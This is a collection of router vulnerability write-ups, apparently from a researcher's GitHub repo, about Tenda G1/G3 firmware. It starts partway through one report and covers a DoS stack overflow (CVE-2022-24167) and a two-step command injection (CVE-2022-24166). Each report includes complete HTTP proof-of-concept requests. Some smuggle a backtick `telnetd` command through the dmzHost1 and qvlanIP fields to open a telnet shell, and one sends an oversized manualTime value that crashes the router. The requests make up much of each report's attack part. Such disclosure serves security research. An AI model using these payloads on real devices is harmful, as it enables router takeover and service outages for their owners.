POST /goform/setDMZ HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/virtualServer/dmzConfig.html?0.863601486768105
Cookie: \_:USERNAME:\_=; G3v3\_user=

dmzEn1=true&vpnFliter1=true&dmzHost1=\`telnetd\`&dmzEn2=false

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_39/images/4.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_39/images/5.png)

CVE-2022-24167: my_vuln/39.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formSetSysTime. This vulnerability allows attackers to cause a Denial of Service (DoS) via the manualTime parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formSetSysTime` function, `manualTime` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `manualTime` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_42/images/1.png)

As you can see here, the input has not been checked. In `formSetSysTime` function, the parameter `manualTime` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `manualTime` as **aaaaaaaaa......-01-26+22%3A16%3A23** , and the router will crash, such as:

POST /goform/setSysTime HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 171
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/sysManage/sysTime.html?0.44124509260857536
Cookie: \_:USERNAME:\_=; G3v3\_user=q

sysTimePolicy=manual&manualTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-01-26+22%3A16%3A23

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_42/images/2.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24166: my_vuln/42.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetQvlanList. This vulnerability allows attackers to execute arbitrary commands via the qvlanIP parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `formSetQvlanList` function, `qvlanIP` is directly passed by the attacker, so we can control the `qvlanIP` to attack the OS.

First, make corresponding settings according to the selected network mode. This vulnerability occurs in the `formSetHotelMode` function. We mainly explain the data flow of this part.

This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.**It should be noted that here you need to ensure that the value of `wans.policy.type` is 0**.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_38/images/1.png)

In `netctrl` binary:

In `advance_set_hotel_mode_cfg` function, the initial input will be extracted and cause command injection.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_38/images/2.png)

**Where does the value of `pVlanCfg->Cfg[ida].vlanIp` come from?**

In `advance_get_vlan_base_cfg` function

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_38/images/3.png)

**Where does the value of `vlan.tag.list%d` come from?**

In `httpd` binary:

In `formSetQvlanList` function

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_38/images/4.png)

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_38/images/5.png)

**Supplement**

The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.

Vulnerability trigger steps:

*   set `qvlanIP` \=`telent`, in (`formSetQvlanList`)
*   set hotel mode, in (`formSetHotelMode`)

**PoC**

set `qvlanIP` \=`telent`, in (`formSetQvlanList`)

POST /goform/setQvlanList HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 140
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/network/vlanSet.html?0.8356422902255819
Cookie: \_:USERNAME:\_=; G3v3\_user=

qvlanIndex=0&qvlanAction=add&qvlanPhyPort=1&qvlanEn=true&qvlanId=10&qvlanName=pjqwudi&qvlanIP=\`telnetd\`&qvlanMask=255.255.255.0&qvlanRemark=

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_38/images/6.png)

set hotel mode, in (`formSetHotelMode`)

POST /goform/setHotelModeInfo HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/network/plugAndPlay.html?0.7948986057914317
Cookie: \_:USERNAME:\_=; G3v3\_user=

hotelModeEn=true

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_38/images/7.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_38/images/8.png)

Tag

#ubuntu